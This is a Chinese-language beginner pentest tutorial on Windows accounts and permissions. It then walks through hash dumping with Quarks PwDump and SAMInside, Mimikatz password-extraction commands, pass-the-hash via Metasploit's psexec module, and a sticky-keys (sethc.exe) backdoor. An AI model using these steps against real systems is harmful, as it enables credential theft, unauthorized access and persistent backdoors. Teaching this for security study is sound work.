來自i春秋作者:zusheng

前言

本篇是基礎教程,帶大家了解Windows常用用戶及用戶組,本地提取用戶密碼,遠程利用Hash登錄到本地破解Hash。初步掌握Windows基礎安全知識。

目錄

  • 第一節 初識Windows
  • 第二節 Windows密碼安全
  • 第三節 利用Hash遠程登錄系統

正文

第一節 初識Windows

1.1、什么是Window

Microsoft Windows,是美國微軟公司研發的一套操作系統,它問世于1985年,起初僅僅是Microsoft-DOS模擬環境,后續的系統版本由于微軟不斷的更新升級,不但易用,也慢慢的成為家家戶戶人們最喜愛的操作系統。Windows采用了圖形化模式GUI,比起從前的DOS需要鍵入指令使用的方式更為人性化。隨著電腦硬件和軟件的不斷升級,微軟的Windows也在不斷升級,從架構的16位、32位再到64位, 系統版本從最初的Windows 1.0 到大家熟知的Windows 95、Windows 98、Windows ME、Windows 2000、Windows 2003、Windows XP、Windows Vista、Windows 7、Windows 8、Windows 8.1、Windows 10 和 Windows Server服務器企業級操作系統。

1.2、Windows常用用戶

  • SYSTEM:本地機器上擁有最高權限的用戶。
  • Administrator:本地機器上擁有最高權限的用戶。
  • Guest:只擁有相對較少的權限,默認被禁用。

1.3、Windows常見用戶組

Administrators,管理員組,默認情況下,Administrators中的用戶對計算機/域有不受限制的完全訪問權。分配給該組的默認權限允許對整個系統進行完全控制。所以,只有受信任的人員才可成為該組的成員。

Power Users,高級用戶組,Power Users 可以執行除了為 Administrators 組保留的任務外的其他任何操作系統任務。分配給 Power Users 組的默認權限允許 Power Users 組的成員修改整個計算機的設置。但Power Users 不具有將自己添加到 Administrators 組的權限。在權限設置中,這個組的權限是僅次于Administrators的。

Users:普通用戶組,這個組的用戶無法進行有意或無意的改動。因此,用戶可以運行經過驗證的應用程序,但不可以運行大多數舊版應用程序。Users 組是最安全的組,因為分配給該組的默認權限不允許成員修改操作系統的設置或用戶資料。Users 組提供了一個最安全的程序運行環境。在經過 NTFS 格式化的卷上,默認安全設置旨在禁止該組的成員危及操作系統和已安裝程序的完整性。用戶不能修改系統注冊表設置、操作系統文件或程序文件。Users 可以關閉工作站,但不能關閉服務器。Users 可以創建本地組,但只能修改自己創建的本地組。

Guests:來賓組,按默認值,來賓跟普通Users的成員有同等訪問權,但來賓帳戶的限制更多。

Everyone:顧名思義,所有的用戶,這個計算機上的所有用戶都屬于這個組。

1.4、Windows文件夾權限

①完全控制(Full Control): 該權限允許用戶對文件夾、子文件夾、文件進行全權控制,如修改資源的權限、獲取資源的所有者、刪除資源的權限等,擁有完全控制權限就等于擁有了其他所有的權限;

②修改(Modify): 該權限允許用戶修改或刪除資源,同時讓用戶擁有寫入及讀取和運行權限;

③讀取和運行(Read & Execute): 該權限允許用戶擁有讀取和列出資源目錄的權限,另外也允許用戶在資源中進行移動和遍歷,這使得用戶能夠直接訪問子文件夾與文件,即使用戶沒有權限訪問這個路徑;

④列出文件夾目錄(List Folder Contents): 該權限允許用戶查看資源中的子文件夾與文件名稱;

⑤讀取(Read): 該權限允許用戶查看該文件夾中的文件以及子文件夾,也允許查看該文件夾的屬性、所有者和擁有的權限等;

⑥寫入(Write): 該權限允許用戶在該文件夾中創建新的文件和子文件夾,也可以改變文件夾的屬性、查看文件夾的所有者和權限等。

第二節 Windows密碼安全

工具一、Quarks PwDump

Quarks PwDump 是一個Win32環境下的系統授權信息導出工具,目前除此之外沒有任何一款工具可以導出如此全面的信息,支持這么多的OS版本,且相當穩定。它目前可以導出 :- Local accounts NT/LM hashes + history 本機NT/LM哈希+歷史登錄記錄 – Domain accounts NT/LM hashes + history 域中的NT/LM哈希+歷史登錄記錄 – Cached domain password 緩存中的域管理密碼 – Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢復后遺留的信息支持的操作系統 : XP/2003/Vista/7/2008/81 / USAGE

使用說明:

quarks-pwdump.exe <options>
Options :
-dhl  --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd  --dump-hash-domain (NTDS_FILE must be specified)
-db   --dump-bitlocker (NTDS_FILE must be specified)
-nt   --ntds-file FILE
-hist --with-history (optional)
-t    --output-type JOHN/LC (optional, if no=>JOHN)
-o    --output FILE (optional, if no=>stdout)

Example: quarks-pwdump.exe --dump-hash-domain --with-history

工具二、SAMInside

SAMInside為一款俄羅斯出品的Windows密碼恢復軟件,支持Windows NT/2000/XP/Vista操作系統,主要用來恢復Windows的用戶登錄密碼

使用說明: 導入本地系統和文件,當然,也可以從項目文件、文件導入,注意SAM文件是系統的SAM文件,一般在C:\WINDOWS\system32\config路徑下,看下圖: 按快捷鍵“F4”,視密碼復雜程度、密碼長度和機器性能,有時很快就等到結果,如果時間過長,還可以暫停,保存破解狀態留待下次接著運行。

工具三、Mimikatz

大神們都知道的東西吧,滲透測試常用工具。法國一個牛B的人寫的輕量級調試器,可以幫助安全測試人員抓取Windows密碼。

使用說明:

第一條:privilege::debug
                //提升權限
第二條:sekurlsa::logonpasswords
              //抓取密碼

首先你需要知道自己操作系統的位數 右鍵我的電腦屬性

如果您的電腦是64位,則會明確標明“x64”,如果沒有標明則說明您的電腦是32位的。

第三節 利用Hash遠程登錄系統

第二節我們獲取到的Hash:

44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4

打開Metasploit

use exploit/windows/smb/pse xec //沒辦法,請去掉中間空格,在一起會被屏蔽

設置一下攻擊參數

設置Payload

無法利用怎么辦?

本地暴力破解Hash

本地軟件下載彩虹表進行暴力破解我這里就不講解了。 給大家一個在線破解的網站,方便快捷。 http://www.objectif-securite.ch/ophcrack.php

小技巧:Windows2003-Shift后門

Shift后門制作

sethc.exe就是Windows的粘滯鍵,我們備份一下。

將cmd.exe改成sethc.exe

在用戶登錄界面連按五次shift

結束語

勿忘初心,方得始終

去i春秋查看更多:http://bbs.ichunqiu.com/thread-8826-1-1.html?from=paper


Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/17/